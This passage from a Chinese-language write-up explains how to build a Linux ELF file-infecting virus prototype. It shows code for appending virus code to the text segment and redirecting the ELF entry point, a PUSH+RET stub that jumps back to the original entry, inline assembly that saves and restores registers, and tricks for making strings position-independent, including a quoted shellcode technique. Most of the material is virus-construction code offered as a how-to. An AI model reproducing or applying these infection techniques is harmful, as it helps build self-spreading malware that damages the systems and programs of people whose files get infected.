四、 关键技术问题及处理

1 ELF文件执行流程重定向和代码插入

在ELF文件感染的问题上，ELF Infector与病毒传播时调用的infect_virus思路是一样的：

* 定位到文本段，将病毒的代码接到文本段的尾部。这个过程的关键是要熟悉
ELF文件的格式，将病毒代码复制到文本段尾部后，能够根据需要调整文本段长度改变
所影响到的后续段(segment)或节(section)的虚拟地址。同时注意把新引入的文本段部
分与一个.setion建立关联，防止strip这样的工具将插入的代码去除。还有一点就是要
注意文本段增加长度的对齐问题，见ELF文档中的描述：
p_align
As ``Program Loading'' later in this part describes, loadable
process segments must have congruent values for p_vaddr and
p_offset, modulo the page size.

* 通过过将ELF文件头中的入口地址修改为病毒代码地址来完成代码重定向：
/* Modify the entry point of the ELF */
org_entry = ehdr->e_entry;
ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;

2 病毒代码如何返回到真正的ELF文件入口

方法技巧应该很多，这里采用的方法是PUSH+RET组合：
__asm__ volatile (
...
"return:\n\t"
"push $0xAABBCCDD\n\t" /* push ret_addr */
"ret\n"
::);
其中0xAABBCCDD处存放的是真正的程序入口地址，这个值在插入病毒代码时由感染程
序来填写。
3 堆栈和寄存器的恢复

病毒代码必须保证运行前、后的堆栈和寄存器内容完全相同，这通过增加额外的代码
来完成。
在进入时：
__asm__ volatile (
"push %%eax\n\t"
"push %%ecx\n\t"
"push %%edx\n\t"
::);
退出时：
__asm__ volatile (
"popl %%edx\n\t"
"popl %%ecx\n\t"
"popl %%eax\n\t"
"addl $0x102c, %%esp\n\t"
"popl %%ebx\n\t"
"popl %%esi\n\t"
"popl %%edi\n\t"
"popl %%ebp\n\t"
"jmp return\n"

要注意上面的代码是根据特定的编译器、编译选项来调整的，在不同的环境下如果重
新编译病毒程序，可能还需要做一些调整。

4 字符串的使用

write(1, "hello world\n", 12);
在病毒代码中这样对一个字符串直接引用是不可以的。这是对字符串的使用是一个绝
对地址引用，病毒代码在进入到一个新的宿主内后，这一绝对地址的内容是无法得到
保证的，因此在病毒代码内应该使用相对地址或间接地址进行字符串访问。
下面是Silvio Cesare的《UNIX ELF PARASITES AND VIRUS》中的一个解决办法，利用
了缓冲区溢出中shellcode的编写技术：
In x86 Linux, some syscalls require the use of an absolute address pointing to initialized data. This can be made relocatable by using a common trick used
in buffer overflow code.

jmp A
B:
pop %eax ; %eax now has the address of the string
. ; continue as usual
.
.

A:
call B
.string \"hello\"
By making a call directly proceeding the string of interest, the address of
the string is pushed onto the stack as the return address.

但是在编写这个linux病毒原型代码时，我并没有使用这个方法，我尽力使代码使用
C语言的语法：
char tmpfile[32] = {'/','t','m','p','/','.','g','v','i','r','u','s','\0'};

#ifndef NDEBUG
char err_type[32] = {'f','i','l','e',' ','t','y','p','e',' ','n','o','t',' ',
's','u','p','p','o','r','t','e','d','\n','\0'};
char luck[32] = {'B','e','t','t','e','r',' ','l','u','c','k',' ',
'n','e','x','t',' ','f','i','l','e','\n','\0'};
#endif

在这里将字符串以字符数组的形式出现，编译之后的代码是这样：
...
movb $47, -8312(%ebp)
movb $116, -8311(%ebp)
movb $109, -8310(%ebp)
movb $112, -8309(%ebp)
movb $47, -8308(%ebp)
movb $46, -8307(%ebp)
movb $103, -8306(%ebp)
movb $118, -8305(%ebp)
movb $105, -8304(%ebp)
movb $114, -8303(%ebp)
movb $117, -8302(%ebp)
movb $115, -8301(%ebp)
...
这样带来一个负面影响就是增加了代码长度，但是适当的使用对代码长度影响并不大。 值得注意的一点是，当字符数组定义的尺寸超过了64时，在我的编译环境下，编译器
对代码进行了优化，会导致编译后代码成为：
...
.section. rodata
.LC0:
.byte 47
.byte 116
.byte 109
.byte 112
.byte 47
.byte 46
.byte 103
.byte 118
.byte 105
.byte 114
.byte 117
.byte 115
.byte 0


数据被放到了.rodata section中，这样就使得其无法随病毒代码一起进入宿主，会
造成访问失败，所以注意数组的申请尽量保持32以内，防止编译器优化。

除此之外，使用整型数组的方法也与此类似，不再赘述。